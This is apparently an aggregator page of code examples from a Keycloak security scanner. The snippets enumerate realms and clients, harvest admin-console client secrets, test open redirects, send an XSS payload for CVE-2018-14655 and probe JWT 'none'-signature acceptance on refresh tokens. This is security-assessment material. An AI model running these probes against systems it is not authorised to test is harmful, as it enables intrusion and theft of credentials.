Python verbose Examples, keycloak_scanner.custom_logging.verbose Python Examples

Example #1

0

Show file

File: clients_scanner.py Project: KoEnix/keycloak-scanner

    def perform(self, launch_properties, scan_properties):

        base_url = launch_properties['base_url']
        realms = scan_properties['realms'].keys()
        clients = DEFAULT_CLIENTS + launch_properties['clients']

        scan_properties['clients'] = {}

        for realm in realms:
            for client in clients:
                url = URL_PATTERN.format(base_url, realm, client)
                r = requests.get(url)

                if r.status_code != 200:
                    url = scan_properties['wellknowns'][realm][
                        'authorization_endpoint']
                    r = requests.get(url,
                                     params={'client_id': client},
                                     allow_redirects=False)
                    if r.status_code == 302:
                        info('Find a client for realm {}: {}'.format(
                            realm, client))
                        add_list(scan_properties['clients'], realm, client)
                    else:
                        verbose('client {} seems to not exists'.format(client))
                else:
                    info('Find a client for realm {}: {} ({})'.format(
                        realm, client, url))
                    add_list(scan_properties['clients'], realm, client)

Example #2

0

Show file

    def perform(self, launch_properties, scan_properties):

        realms = scan_properties['realms'].keys()

        for realm in realms:
            clients = scan_properties['clients'][realm]
            well_known = scan_properties['wellknowns'][realm]

            api = KeyCloakApi(well_known)

            if 'security-admin-console' not in scan_properties \
                    or realm not in scan_properties['security-admin-console'] \
                    or 'secret' not in scan_properties['security-admin-console'][realm]:
                verbose('No secret for realm {}'.format(realm))
                continue

            client_secret = scan_properties['security-admin-console'][realm][
                'secret']

            for client in clients:
                if 'username' in launch_properties:
                    username = launch_properties['username']
                    if 'password' in launch_properties:
                        password = launch_properties['password']
                        test_none(api, client, client_secret, username,
                                  password)
                    else:
                        test_none(api, client, client_secret, username,
                                  username)
                else:
                    info(
                        'No none scan, provide credentials to test jwt none signature'
                    )

Example #3

0

Show file

    def perform(self, launch_properties, scan_properties):

        realms = scan_properties['realms'].keys()

        for realm in realms:
            clients = scan_properties['clients'][realm]
            well_known = scan_properties['wellknowns'][realm]
            if 'code' not in well_known['response_types_supported']:
                verbose(
                    'code not in supported response types, can\' test redirect_uri for realm {}'
                    .format(realm))
            else:
                url = well_known['authorization_endpoint']

                for client in clients:

                    r = requests.get(
                        url,
                        params={
                            'response_type':
                            'code',
                            'client_id':
                            client,
                            'redirect_uri':
                            'https://devops-devsecops.org/auth/{}/{}/'.format(
                                realm, client)
                        })

                    if r.status_code == 200:
                        find('Open redirection for realm {} and clientid {}'.
                             format(realm, client))

Example #4

0

Show file

    def perform(self, launch_properties, scan_properties):

        realms = scan_properties['realms'].keys()

        for realm in realms:
            clients = scan_properties['clients'][realm]
            well_known = scan_properties['wellknowns'][realm]
            if 'form_post' not in well_known['response_modes_supported']:
                verbose(
                    'post_form not in supported response types, can\' test CVE-2018-14655 for realm {}'
                    .format(realm))
            else:
                url = well_known['authorization_endpoint']

                for client in clients:

                    payload = 'af0ifjsldkj"/><script type="text/javascript">alert(1)</script> <p class="'
                    r = Request.request().get(url,
                                              params={
                                                  'state': payload,
                                                  'response_type': 'token',
                                                  'response_mode': 'form_post',
                                                  'client_id': client,
                                                  'nonce': 'csa3hMlvybERqcieLH'
                                              })

                    if r.status_code == 200:
                        if payload in r.text:
                            find(
                                'Vulnerable to CVE 2018 14655 realm:{}, client:{}'
                                .format(realm, client))

Example #5

0

Show file

File: well_known_scanner.py Project: KoEnix/keycloak-scanner

 def perform(self, launch_properties, scan_properties):
     realms = scan_properties['realms'].keys()
     for realm in realms:
         base_url = launch_properties['base_url']
         url = URL_PATTERN.format(base_url, realm)
         r = requests.get(url)
         if r.status_code != 200:
             verbose('Bad status code for realm {} {}: {}'.format(
                 realm, url, r.status_code))
         else:
             info('Find a well known for realm {} {}'.format(realm, url))
             add_kv(scan_properties, 'wellknowns', realm, r.json())

Example #6

0

Show file

File: realm_scanner.py Project: KoEnix/keycloak-scanner

 def perform(self, launch_properties, scan_properties):
     realms = launch_properties['realms']
     for realm in DEFAULT_REALMS + realms:
         base_url = launch_properties['base_url']
         url = URL_PATTERN.format(base_url, realm)
         r = requests.get(url)
         if r.status_code != 200:
             verbose('Bad status code for realm {} {}: {}'.format(
                 realm, url, r.status_code))
         else:
             info('Find realm {} ({})'.format(realm, url))
             add_kv(scan_properties, 'realms', realm, r.json())
             if 'public_key' in scan_properties['realms'][realm]:
                 info('Public key for realm {} : {}'.format(
                     realm, scan_properties['realms'][realm]['public_key']))

Example #7

0

Show file

def test_none(api, client, client_secret, username, password):
    try:
        access_token, refresh_token = api.get_token(client, client_secret,
                                                    username, password)
        info(
            'Got token via password method. access_token:{}, refresh_token:{}'.
            format(access_token, refresh_token))
        none_refresh_token = change_to_none(refresh_token)
        try:
            access_token, refresh_token = api.refresh(client,
                                                      none_refresh_token)
            find('Refresh work with none. access_token:{}, refresh_token:{}'.
                 format(access_token, refresh_token))
        except Exception as e:
            verbose('None refresh token fail : {}'.format(e))
    except Exception as e:
        verbose(e)

Example #8

0

Show file

    def perform(self, launch_properties, scan_properties):

        base_url = launch_properties['base_url']
        realms = list(scan_properties['realms'].keys())
        for realm in realms:
            url = URL_PATTERN.format(base_url, realm)
            r = requests.get(url)
            if r.status_code != 200:
                verbose('Bad status code for {}: {}'.format(
                    url, r.status_code))
            else:
                find('Find a security-admin-console {}: {}'.format(
                    url, r.status_code))
                add_kv(scan_properties, 'security-admin-console', realm,
                       r.json())
                if 'secret' in scan_properties['security-admin-console'][
                        realm]:
                    find('Find secret for realm {} : {}'.format(
                        realm, scan_properties['security-admin-console'][realm]
                        ['secret']))